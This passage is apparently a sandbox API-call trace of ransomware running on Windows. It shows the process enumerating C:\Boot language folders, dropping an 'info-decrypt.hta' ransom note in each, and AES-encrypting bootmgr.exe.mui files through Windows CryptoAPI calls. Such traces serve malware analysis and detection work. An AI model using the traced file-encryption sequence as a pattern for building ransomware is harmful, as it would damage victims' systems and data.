lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x379596c*, lpNumberOfBytesRead=0x6a7f1bc*=0x12650, lpOverlapped=0x0) returned 1 [0177.293] CloseHandle (hObject=0x280) returned 1 [0177.293] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66ba7c8) returned 1 [0177.294] CryptGenRandom (in: hProv=0x66ba7c8, dwLen=0x10, pbBuffer=0x37a8310 | out: pbBuffer=0x37a8310) returned 1 [0177.851] CryptImportKey (in: hProv=0x66ba7c8, pbData=0x37af938, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f510) returned 1 [0177.852] CryptContextAddRef (hProv=0x66ba7c8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0177.852] CryptContextAddRef (hProv=0x66ba7c8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0177.852] CryptDuplicateKey (in: hKey=0xb7f510, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7fad0) returned 1 [0177.852] CryptContextAddRef (hProv=0x66ba7c8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0177.852] CryptSetKeyParam (hKey=0xb7fad0, dwParam=0x4, pbData=0x37afa18*=0x1, dwFlags=0x0) returned 1 [0177.852] CryptSetKeyParam (hKey=0xb7fad0, dwParam=0x1, pbData=0x37af9e4, dwFlags=0x0) returned 1 [0177.852] CryptEncrypt (in: hKey=0xb7fad0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37b21bc*, pdwDataLen=0x6a7f188*=0x12660, dwBufLen=0x12660 | out: pbData=0x37b21bc*, pdwDataLen=0x6a7f188*=0x12660) returned 1 [0177.853] CryptEncrypt (in: hKey=0xb7fad0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c4840*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x37c4840*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0177.854] CryptDestroyKey (hKey=0xb7f510) returned 1 [0177.854] CryptReleaseContext (hProv=0x66ba7c8, dwFlags=0x0) returned 1 [0177.854] CryptReleaseContext (hProv=0x66ba7c8, dwFlags=0x0) returned 1 [0177.854] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0177.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0177.854] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0177.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0177.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0177.856] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0177.856] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\", lpFilePart=0x0) returned 0xe [0177.856] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f510 [0177.857] FindNextFileW (in: hFindFile=0xb7f510, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.857] FindNextFileW (in: hFindFile=0xb7f510, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0177.857] FindNextFileW (in: hFindFile=0xb7f510, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.857] FindClose (in: hFindFile=0xb7f510 | out: hFindFile=0xb7f510) returned 1 [0177.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0177.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0177.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0177.860] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0177.860] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\", lpFilePart=0x0) returned 0xe [0177.861] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f510 [0177.861] FindNextFileW (in: hFindFile=0xb7f510, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.861] FindNextFileW (in: hFindFile=0xb7f510, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0177.861] FindNextFileW (in: hFindFile=0xb7f510, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0177.861] FindClose (in: hFindFile=0xb7f510 | out: hFindFile=0xb7f510) returned 1 [0177.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0177.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0177.862] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0177.862] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0177.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0177.862] GetFileAttributesExW (in: lpFileName="C:\\Boot\\nb-NO\\info-decrypt.hta" (normalized: "c:\\boot\\nb-no\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0177.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0177.862] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0177.862] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0177.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0177.862] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\info-decrypt.hta" (normalized: "c:\\boot\\nb-no\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x280 [0177.862] GetFileType (hFile=0x280) returned 0x1 [0177.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0177.862] GetFileType (hFile=0x280) returned 0x1 [0177.863] WriteFile (in: hFile=0x280, lpBuffer=0x37c76b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x37c76b8*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0177.863] WriteFile (in: hFile=0x280, lpBuffer=0x37c76b8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x37c76b8*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0177.863] CloseHandle (hObject=0x280) returned 1 [0177.864] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0177.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0177.864] GetFileAttributesExW (in: lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x37c86d4 | out: lpFileInformation=0x37c86d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850)) returned 1 [0177.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0177.864] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0177.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0177.864] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0177.864] GetFileType (hFile=0x280) returned 0x1 [0177.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0177.865] GetFileType (hFile=0x280) returned 0x1 [0177.865] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x15850 [0177.865] ReadFile (in: hFile=0x280, lpBuffer=0x8c443b8, nNumberOfBytesToRead=0x15850, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x8c443b8*, lpNumberOfBytesRead=0x6a7f1bc*=0x15850, lpOverlapped=0x0) returned 1 [0178.078] CloseHandle (hObject=0x280) returned 1 [0178.078] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66bac08) returned 1 [0178.079] CryptGenRandom (in: hProv=0x66bac08, dwLen=0x10, pbBuffer=0x37c8b94 | out: pbBuffer=0x37c8b94) returned 1 [0179.859] CryptImportKey (in: hProv=0x66bac08, pbData=0x36b0c58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7fb50) returned 1 [0179.859] CryptContextAddRef (hProv=0x66bac08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.859] CryptContextAddRef (hProv=0x66bac08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.859] CryptDuplicateKey (in: hKey=0xb7fb50, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f390) returned 1 [0179.859] CryptContextAddRef (hProv=0x66bac08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.859] CryptSetKeyParam (hKey=0xb7f390, dwParam=0x4, pbData=0x36b0d38*=0x1, dwFlags=0x0) returned 1 [0179.859] CryptSetKeyParam (hKey=0xb7f390, dwParam=0x1, pbData=0x36b0d04, dwFlags=0x0) returned 1 [0179.860] CryptEncrypt (in: hKey=0xb7f390, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c59c28*, pdwDataLen=0x6a7f188*=0x15860, dwBufLen=0x15860 | out: pbData=0x8c59c28*, pdwDataLen=0x6a7f188*=0x15860) returned 1 [0179.861] CryptEncrypt (in: hKey=0xb7f390, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36b0d60*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x36b0d60*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0179.863] CryptDestroyKey (hKey=0xb7fb50) returned 1 [0179.863] CryptReleaseContext (hProv=0x66bac08, dwFlags=0x0) returned 1 [0179.863] CryptReleaseContext (hProv=0x66bac08, dwFlags=0x0) returned 1 [0179.863] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0179.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0179.863] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0179.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0179.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0179.865] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0179.865] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\", lpFilePart=0x0) returned 0xe [0179.865] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fb50 [0179.866] FindNextFileW (in: hFindFile=0xb7fb50, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.866] FindNextFileW (in: hFindFile=0xb7fb50, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.866] FindNextFileW (in: hFindFile=0xb7fb50, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0179.866] FindClose (in: hFindFile=0xb7fb50 | out: hFindFile=0xb7fb50) returned 1 [0179.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0179.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0179.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0179.867] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0179.867] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\", lpFilePart=0x0) returned 0xe [0179.867] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fb50 [0179.867] FindNextFileW (in: hFindFile=0xb7fb50, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.867] FindNextFileW (in: hFindFile=0xb7fb50, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.868] FindNextFileW (in: hFindFile=0xb7fb50, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.868] FindClose (in: hFindFile=0xb7fb50 | out: hFindFile=0xb7fb50) returned 1 [0179.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0179.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0179.868] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0179.868] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0179.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0179.868] GetFileAttributesExW (in: lpFileName="C:\\Boot\\nl-NL\\info-decrypt.hta" (normalized: "c:\\boot\\nl-nl\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0179.868] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0179.869] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0179.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0179.869] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\info-decrypt.hta" (normalized: "c:\\boot\\nl-nl\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0179.869] GetFileType (hFile=0x264) returned 0x1 [0179.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0179.869] GetFileType (hFile=0x264) returned 0x1 [0179.869] WriteFile (in: hFile=0x264, lpBuffer=0x36b3bd8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x36b3bd8*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0179.870] WriteFile (in: hFile=0x264, lpBuffer=0x36b3bd8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x36b3bd8*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0179.870] CloseHandle (hObject=0x264) returned 1 [0179.871] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0179.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0179.871] GetFileAttributesExW (in: lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), fInfoLevelId=0x0, 